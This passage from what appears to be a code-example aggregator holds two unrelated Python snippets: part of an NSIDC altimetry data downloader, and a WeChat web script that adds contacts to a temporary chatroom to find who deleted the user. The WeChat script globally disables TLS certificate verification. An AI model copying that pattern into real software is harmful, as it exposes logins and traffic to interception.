            m = read_geojson_file(os.path.expanduser(FILE), VARIABLES=v)
        else:
            raise IOError('Unlisted polygon type ({0})'.format(fileExtension))
        #-- calculate the bounds of the MultiPolygon object
        bounds_flag = '&bounding_box={0:f},{1:f},{2:f},{3:f}'.format(*m.bounds)
        #-- calculate the convex hull of the MultiPolygon object for subsetting
        #-- the NSIDC api requires polygons to be in counter-clockwise order
        X,Y = shapely.geometry.polygon.orient(m.convex_hull,sign=1).exterior.xy
        #-- coordinate order for polygon flag is lon1,lat1,lon2,lat2,...
        polygon_flag = ','.join(['{0:f},{1:f}'.format(x,y) for x,y in zip(X,Y)])
        spatial_flag = '&polygon={0}'.format(polygon_flag)
    else:
        #-- do not spatially subset data
        bounds_flag = ''
        spatial_flag = ''

    #-- if changing the output format
    format_flag = '&format={0}'.format(FORMAT) if FORMAT else ''

    #-- get dictionary of granules for temporal and spatial subset
    HOST = posixpath.join('https://cmr.earthdata.nasa.gov','search','granules')
    page_size,page_num = (10,1)
    granules = {}
    FLAG = True
    #-- reduce to a set number of files per page and then iterate through pages
    while FLAG:
        #-- flags for page size and page number
        size_flag = '&page_size={0:d}'.format(page_size)
        num_flag = '&page_num={0:d}'.format(page_num)
        #-- url for page
        remote_url = ''.join([HOST,product_flag,version_flag,bounds_flag,
            temporal_flag,size_flag,num_flag])
        #-- Create and submit request. There are a wide range of exceptions
        #-- that can be thrown here, including HTTPError and URLError.
        request = urllib2.Request(remote_url)
        tree = lxml.etree.parse(urllib2.urlopen(request, timeout=20), parser)
        root = tree.getroot()
        #-- total number of hits for subset (not just on page)
        hits = int(tree.find('hits').text)
        #-- extract references on page
        references = [i for i in tree.iter('reference',root.nsmap)]
        #-- check flag
        FLAG = (len(references) > 0)
        for reference in references:
            name = reference.find('name',root.nsmap).text
            id = reference.find('id',root.nsmap).text
            location = reference.find('location',root.nsmap).text
            revision_id = reference.find('revision-id',root.nsmap).text
            #-- read CMR metadata location to get filename
            req = urllib2.Request(location)
            #-- parse CMR metadata location url
            tr = lxml.etree.parse(urllib2.urlopen(req, timeout=20), parser)
            r = tr.getroot()
            f,=tr.xpath('.//gmd:fileIdentifier/gmx:FileName',namespaces=r.nsmap)
            #-- create list of id, CMR location, revision and file
            granules[name] = [id,location,revision_id,f.text]
        #-- add to page number if valid page
        page_num += 1 if FLAG else 0

    #-- for each page of data
    for p in range(1,page_num):
        #-- flags for page size and page number
        size_flag = '&page_size={0:d}'.format(page_size)
        num_flag = '&page_num={0:d}'.format(p)
        #-- remote https server for page of NSIDC Data
        HOST = posixpath.join('https://n5eil02u.ecs.nsidc.org','egi','request')
        remote_url = ''.join([HOST,product_flag,version_flag,bounds_flag,
            spatial_flag,time_flag,format_flag,size_flag,num_flag])

        #-- local file
        today = time.strftime('%Y-%m-%dT%H-%M-%S',time.localtime())
        #-- download as either zipped file (default) or unzip to a directory
        if UNZIP:
            #-- Create and submit request. There are a wide range of exceptions
            #-- that can be thrown here, including HTTPError and URLError.
            request = urllib2.Request(remote_url)
            response = urllib2.urlopen(request)
            #-- read to BytesIO object
            fid = io.BytesIO(response.read())
            #-- use zipfile to extract contents from bytes
            remote_data = zipfile.ZipFile(fid)
            subdir = '{0}_{1}'.format(PRODUCT,today)
            print('{0} -->\n'.format(remote_url)) if VERBOSE else None
            #-- extract each member and convert permissions to MODE
            for member in remote_data.filelist:
                local_file = os.path.join(filepath,subdir,member.filename)
                print('\t{0}\n'.format(local_file)) if VERBOSE else None
                remote_data.extract(member, path=os.path.join(filepath,subdir))
                os.chmod(local_file, MODE)
            #-- close the zipfile object
            remote_data.close()
        else:
            #-- Printing files transferred if VERBOSE
            local_zip=os.path.join(filepath,'{0}_{1}.zip'.format(PRODUCT,today))
            args = (remote_url,local_zip)
            print('{0} -->\n\t{1}\n'.format(*args)) if VERBOSE else None
            #-- Create and submit request. There are a wide range of exceptions
            #-- that can be thrown here, including HTTPError and URLError.
            request = urllib2.Request(remote_url)
            response = urllib2.urlopen(request)
            #-- copy contents to local file using chunked transfer encoding
            #-- transfer should work properly with ascii and binary data formats
            CHUNK = 16 * 1024
            with open(local_zip, 'wb') as f:
                shutil.copyfileobj(response, f, CHUNK)
            #-- keep remote modification time of file and local access time
            # os.utime(local_zip, (os.stat(local_zip).st_atime, remote_mtime))
            #-- convert permissions to MODE
            os.chmod(local_zip, MODE)
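A hypothetical invocation of nsidc_subset_altimetry() above; the product short name, version, credentials, bounding box and output format below are placeholders, not values from the original source:

#-- download a spatially/temporally subsetted product as a zip file into /tmp/nsidc
nsidc_subset_altimetry('/tmp/nsidc', 'ATL06', '003',
    USER='earthdata_username', PASSWORD='earthdata_password',
    BBOX=[-50.0, 68.0, -48.0, 70.0],          #-- min_lon,min_lat,max_lon,max_lat
    TIME=['2019-01-01', '2019-01-31'],        #-- ISO-parsable start/end times
    FORMAT='NetCDF4-CF', MODE=0o775, VERBOSE=True)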
Example #60
0
def main():

    try:
        ssl._create_default_https_context = ssl._create_unverified_context

        opener = wdf_urllib.build_opener(
            wdf_urllib.HTTPCookieProcessor(CookieJar()))
        wdf_urllib.install_opener(opener)
    except:
        pass

    if not getUUID():
        print('Failed to get uuid')
        return

    showQRImage()
    time.sleep(1)

    while waitForLogin() != '200':
        pass

    os.remove(QRImagePath)

    if not login():
        print('Login failed')
        return

    if not webwxinit():
        print('Initialization failed')
        return

    MemberList = webwxgetcontact()

    MemberCount = len(MemberList)
    print('Contact list contains %s friends' % MemberCount)

    ChatRoomName = ''
    result = []
    d = {}
    for Member in MemberList:
        d[Member['UserName']] = (Member['NickName'].encode('utf-8'),
                                 Member['RemarkName'].encode('utf-8'))
    print('Starting search...')
    group_num = int(math.ceil(MemberCount / float(MAX_GROUP_NUM)))
    for i in range(0, group_num):
        UserNames = []
        for j in range(0, MAX_GROUP_NUM):
            if i * MAX_GROUP_NUM + j >= MemberCount:
                break
            Member = MemberList[i * MAX_GROUP_NUM + j]
            UserNames.append(Member['UserName'])

        # create a new chatroom / add members
        if ChatRoomName == '':
            (ChatRoomName, DeletedList) = createChatroom(UserNames)
        else:
            DeletedList = addMember(ChatRoomName, UserNames)

        DeletedCount = len(DeletedList)
        if DeletedCount > 0:
            result += DeletedList

        # remove members
        deleteMember(ChatRoomName, UserNames)

        # progress bar
        progress_len = MAX_PROGRESS_LEN
        progress = '-' * progress_len
        progress_str = '%s' % ''.join(
            map(lambda x: '#', progress[:(progress_len *
                                          (i + 1)) // group_num]))
        print(''.join([
            '[', progress_str,
            ''.join('-' * (progress_len - len(progress_str))), ']'
        ]))
        print('Newly found: you have been deleted by %d contact(s)' % DeletedCount)
        for k in range(DeletedCount):
            if d[DeletedList[k]][1] != '':
                print(d[DeletedList[k]][0] + '(%s)' % d[DeletedList[k]][1])
            else:
                print(d[DeletedList[k]][0])

        if i != group_num - 1:
            print('Continuing the search, please be patient...')
            # wait time before the next API call
            time.sleep(INTERFACE_CALLING_INTERVAL)
    # todo: delete the chatroom

    print('\nResults compiled; you can retry after 20s...')
    resultNames = []
    for r in result:
        if d[r][1] != '':
            resultNames.append(d[r][0] + '(%s)' % d[r][1])
        else:
            resultNames.append(d[r][0])

    print('---------- Friends who deleted you (%d in total) ----------' % len(result))
    # filter out emoji markup
    resultNames = map(lambda x: re.sub(r'<span.+/span>', '', x), resultNames)
    if len(resultNames):
        print('\n'.join(resultNames))
    else:
        print("无")
    print('---------------------------------------------')
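The member-batching arithmetic used in main() above (ceil(MemberCount / MAX_GROUP_NUM) groups of at most MAX_GROUP_NUM user names each) can be sketched on its own; the helper name below is illustrative:

import math

def split_into_groups(members, max_group_num):
    # ceil(len(members) / max_group_num) batches, each at most max_group_num long,
    # mirroring the nested loops in main().
    group_num = int(math.ceil(len(members) / float(max_group_num)))
    return [members[i * max_group_num:(i + 1) * max_group_num]
            for i in range(group_num)]

# 7 members in batches of 3 -> [[1, 2, 3], [4, 5, 6], [7]]
print(split_into_groups([1, 2, 3, 4, 5, 6, 7], 3))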